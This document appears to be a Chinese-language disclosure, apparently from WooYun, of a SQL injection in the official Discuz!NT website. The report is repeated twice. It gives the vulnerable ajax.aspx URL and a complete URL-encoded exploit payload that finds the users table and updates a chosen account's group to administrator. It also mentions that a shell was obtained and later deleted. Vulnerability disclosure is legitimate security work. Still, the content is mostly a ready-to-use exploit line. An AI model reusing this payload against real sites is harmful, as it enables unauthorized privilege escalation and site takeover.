VULHUB ™

### 简要描述： DNT官网存在SQL注入漏洞，Powered by Discuz!NT 3.9.913 Beta ### 详细说明： 本来是测试凡客（ [WooYun: 凡客诚品某频道再暴SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2012-04474) ），但发现官方也存在。 注入地址： http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用： http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29-- Shell 已经删除 ### 漏洞证明： <img src="https://images.seebug.org/upload/201202/132044049e70c2cdeda27831439ee099e958d379.jpg"> <img src="https://images.seebug.org/upload/201202/132044299f5430827e8570c33273370c0784000c.jpg">

### 简要描述： DNT官网存在SQL注入漏洞，Powered by Discuz!NT 3.9.913 Beta ### 详细说明： 本来是测试凡客（ [WooYun: 凡客诚品某频道再暴SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2012-04474) ），但发现官方也存在。 注入地址： http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 利用： http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29-- Shell 已经删除 ### 漏洞证明： <img src="https://images.seebug.org/upload/201202/132044049e70c2cdeda27831439ee099e958d379.jpg"> <img src="https://images.seebug.org/upload/201202/132044299f5430827e8570c33273370c0784000c.jpg">